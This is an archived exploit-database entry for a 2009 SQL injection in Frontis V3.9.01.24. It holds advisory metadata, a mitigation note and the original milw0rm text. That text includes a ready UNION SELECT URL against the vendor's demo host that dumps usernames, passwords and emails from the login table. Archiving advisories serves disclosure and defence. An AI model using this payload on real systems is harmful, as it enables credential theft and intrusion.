header-logo
Suggest Exploit
vendor:
Frontis V3.9.01.24
by:
Snakespc
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Frontis V3.9.01.24
Affected Version From: V3.9.01.24
Affected Version To: V3.9.01.24
Patch Exists: YES
Related CWE: N/A
CPE: frontisgroup.com
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Frontis V3.9.01.24 Remote SQL Injection Vulnerability

Frontis V3.9.01.24 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames, passwords, and email addresses stored in the application's database.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

             Viva l'Algérie 3-1  --->Karim Matmour-->Abdel-Kader Ghazal-->Rafik al-Zuhair Jabbur-->
                                 Félicitations à tous les Algériens
                                 L'Algérie bat l'Egypte 3-1 à aller
                                     El akouba pour le retour
#-------------------------AllaH AkbaR-------------------------------
#Frontis V3.9.01.24 Remote SQL Injection Vulnerability
#-------------------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com
#Site:http://www.snakespc.com/sc/index.php
#
#            les Algériens Kamikaz Wa4rin Fi kol Bla4s 
#-------------------------SNAKES TEAM-------------------------------
#Script:Frontis V3.9.01.24
#
#http://frontisgroup.com
#--------------------------SNAKES TEAM------------------------------
#Exploit:
#--------
#
#Demo:
#http://demo.frontisgroup.com/bin/aps_browse_sources.php?mode=browse_classes&source_class=1+UNION SELECT 1,group_concat(user_name,0x3a,user_pass,0x2e,user_email),3,4+from+login_table--
#
#-------------------------SNAKES TEAM-------------------------------
# Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4 --->Tous les Algériens
#--------------------------SNAKES TEAM------------------------------
#ALL www.SnakespC.com/sc>>>> (  Members )  >>>>Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-06-08]

Navigation

Suggest Exploit

Services By CQR